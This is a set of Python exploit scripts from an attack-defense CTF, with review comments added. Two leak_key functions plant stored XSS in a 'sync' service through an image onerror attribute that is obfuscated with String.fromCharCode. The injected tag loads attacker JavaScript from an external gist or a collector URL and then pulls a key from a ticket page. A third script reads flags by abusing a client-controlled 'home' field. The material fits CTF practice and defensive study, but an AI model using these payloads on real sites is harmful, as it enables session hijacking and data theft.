def leak_key():
    """Exercise the stored-XSS path in the "sync" service and pull the key out of the resulting ticket page.

    Flow (all against http://{IP}:8000): register a throwaway account, create
    a sync whose ``image_params`` carry an ``onerror`` attribute, solve the
    join challenge, then poll ``/api/ticket/<public_id>`` until a
    ``ticket_url`` appears and run ``regex`` over the fetched page.

    Returns the first regex match, or None when the page has no match or the
    20 polls (0.5 s apart) time out. Relies on module-level names not shown
    here: checklib, requests, IP, mine_answer, sleep, extract_text, regex.

    Service-side takeaway (inferred from the payload shape, not visible in
    this file): the vulnerability being exercised is that caller-supplied
    ``image_params`` keys appear to be emitted as raw HTML attributes on an
    <img>; attribute names/values must be whitelisted or escaped.
    """
    xss_script_url = 'https://gist.githubusercontent.com/jnovikov/7f3d47b45cc8b9696cfe3882cb88f181/raw/4cad1ba6c459fb5c2b86d1b8f15478186c807edc/moim.js'
    email = checklib.rnd_username() + '@cbsctf.live'
    password = checklib.rnd_password()
    s = requests.Session()
    # NOTE(review): 'application/json' is not an Accept-Encoding value; this
    # was probably meant as Accept/Content-Type. Harmless here because
    # `json=` already sets Content-Type, but the header is misleading.
    s.post(f'http://{IP}:8000/api/register', json={
        'email': email,
        'password': password
    }, headers={'Accept-Encoding': 'application/json'})
    # The <script> tag is rebuilt character by character with
    # String.fromCharCode so the attribute value itself contains no quotes
    # or angle brackets — presumably to get past a naive filter; confirm.
    pwn_url = '<script src="{}"></script>'.format(xss_script_url)
    pwn_code = []
    for c in pwn_url:
        x = 'String.fromCharCode({})'.format(ord(c))
        pwn_code.append(x)
    sploit = 'document.write(' + '+'.join(pwn_code) + ')'
    # image_url is unresolvable on purpose so the onerror handler fires.
    params = {'width': '50%', 'onerror': sploit}
    sync_data = {
        'capacity': 10,
        'title': 'hehe',
        'description': 'Totally not an exploit',
        'image_url': 'http://keklolkek.kek',
        'image_params': params
    }
    resp = s.post(f'http://{IP}:8000/api/sync', json=sync_data)
    data = resp.json()
    sync_id = data['id']
    # Joining requires answering a challenge fetched from the service;
    # mine_answer() is defined elsewhere.
    r = s.get(f'http://{IP}:8000/api/sync/{sync_id}/challenge')
    challenge = r.json().get('challenge')
    resp = s.post('http://{}:8000/api/sync/{}/join'.format(IP, sync_id), json={
        'nickname': 'asd',
        'challenge_answer': mine_answer(challenge)
    })
    public_id = resp.json().get('public_id')
    # Poll for the ticket; the ticket_url is only set once the service-side
    # visitor has processed the sync (inferred from the polling — confirm).
    for _ in range(20):
        sleep(0.5)
        r = s.get(f'http://{IP}:8000/api/ticket/' + public_id)
        ticket_data = r.json()
        ticket_url = ticket_data.get('ticket_url')
        if ticket_url:
            url = f'http://{IP}:8000{ticket_url}'
            resp = s.get(url)
            env_file_data = extract_text(resp).decode('utf-8', 'ignore')
            matches = regex.findall(env_file_data)
            if len(matches) == 0:
                return None
            return matches[0]
    # NOTE(review): read from a collapsed source as a for/else, so the timeout
    # message fires only after all 20 polls miss. If the original was an
    # if/else, the first poll without a ticket_url would return None instead.
    else:
        print("Failed to leak key. Timeout", flush=True)
        return None
def register_service(self, password=None):
    """Register a fresh user through the registerForm endpoint.

    A random username is always generated; a random password is generated
    when *password* is falsy. Returns ``(username, password)``. A non-OK
    reply is turned into a checker failure by ``checklib.check_response``.
    """
    login = checklib.rnd_username()
    secret = password or checklib.rnd_password()
    # The service's registerForm endpoint takes credentials as GET query
    # parameters, so they land in URL/access logs. That is a property of the
    # service API the checker has to match, not something to fix here.
    reply = requests.get(
        f'{self.url}/registerForm',
        params={'login': login, 'password': secret},
    )
    checklib.check_response(reply, 'Could not register')
    return login, secret
def _rnd_slave(self, desc, l, r):
    """Build one random record for the checker.

    The fixed keys are Russian: "имя" (name: random username), "описание"
    (description: *desc* verbatim) and "цена" (price: random int in
    ``[l, r]``). Then 0–5 extra entries are appended under random 5-char
    keys; each is, with equal probability, a 10-char random string or a
    nested dict of 1–3 random (4-char key, 15-char value) pairs. Random
    draws happen in the same order as before, so seeded runs are unchanged.
    Later random keys silently overwrite earlier equal ones (unchanged).
    """
    record = {
        "имя": rnd_username(),
        "описание": desc,
        "цена": randint(l, r),
    }
    extra_count = randint(0, 5)
    for _ in range(extra_count):
        nested = randint(0, 1) != 0
        key = rnd_string(5)
        if not nested:
            record[key] = rnd_string(10)
            continue
        child = {}
        for _ in range(randint(1, 3)):
            # Tuple evaluation is left-to-right: key drawn before value.
            child_key, child_val = rnd_string(4), rnd_string(15)
            child[child_key] = child_val
        record[key] = child
    return record
def leak_key():
    """Second variant of the sync stored-XSS probe; prints the join response instead of extracting a key.

    Same register → create-sync → join sequence as the other variant, but the
    injected <script> points at ``helper_url`` (a collector defined
    elsewhere) and the join is a bare, unauthenticated requests.post with no
    challenge answer. Relies on module-level names not shown here: checklib,
    requests, IP, helper_url.

    Service-side takeaway (inferred from the payload shape, not visible in
    this file): ``image_params`` keys appear to be emitted as raw HTML
    attributes; attribute names/values must be whitelisted or escaped.
    """
    email = checklib.rnd_username() + '@cbsctf.live'
    password = checklib.rnd_password()
    s = requests.Session()
    # NOTE(review): 'application/json' is not an Accept-Encoding value;
    # probably meant Accept/Content-Type. `json=` already sets Content-Type.
    resp = s.post(f'http://{IP}:8000/api/register', json={
        'email': email,
        'password': password
    }, headers={'Accept-Encoding': 'application/json'})
    # Script tag rebuilt via String.fromCharCode so the attribute value holds
    # no quotes or angle brackets — presumably to pass a naive filter; confirm.
    pwn_url = f'<script src="{helper_url}/hckk?ip={IP}"></script>'
    pwn_code = []
    for c in pwn_url:
        x = 'String.fromCharCode({})'.format(ord(c))
        pwn_code.append(x)
    sploit = 'document.write(' + '+'.join(pwn_code) + ')'
    # image_url is unresolvable on purpose so the onerror handler fires.
    params = {'width': '50%', 'onerror': sploit}
    sync_data = {
        'capacity': 10,
        'title': 'Anime sync!',
        'description': 'Join us at kek on kek',
        'image_url': 'http://keklolkek.kek',
        'image_params': params
    }
    resp = s.post(f'http://{IP}:8000/api/sync', json=sync_data)
    data = resp.json()
    sync_id = data['id']
    # NOTE(review): join uses requests.post, not the registered session, and
    # sends no challenge_answer — unlike the other variant. Presumably the
    # service build targeted here did not require either; confirm.
    resp = requests.post('http://{}:8000/api/sync/{}/join'.format(IP, sync_id), json={'nickname': 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='})
    print(resp.text, flush=True)
# Exploit-style checker script for the "code" service on port 6091.
# Usage: <script> <target-ip>. Registers a user with a caller-chosen `home`,
# logs in, creates a code entry with an empty `code` list and prints every
# item the service returns for it (one per line, flushed for the runner).
import sys
from checklib import get_initialized_session, rnd_username, rnd_password

ip = sys.argv[1]  # no argument validation: IndexError on missing argv[1]
PORT = 6091
url = f"http://{ip}:{PORT}/api"
s = get_initialized_session()
u, p = rnd_username(), rnd_password()
# NOTE(review): `home` is set from the client. What the service does with it
# is not visible here — presumably it selects the location the later
# /code/<id>/ read resolves against, which is why this works. Service-side,
# that field should not be caller-controlled (or must be validated). Confirm.
s.post(f"{url}/register/", json={
    'username': u,
    'password': p,
    'home': 'evilhacker',
})
s.post(f"{url}/login/", json={
    'username': u,
    'password': p,
})
# Both responses are assumed to be JSON with an 'ok' field: first the new
# entry's id, then a list of values. A non-JSON/error reply raises here.
cid = s.post(f"{url}/code/", json={'work': 'work', 'code': []}).json()['ok']
flags = s.get(f"{url}/code/{cid}/").json()['ok']
for i in flags:
    print(i, flush=True)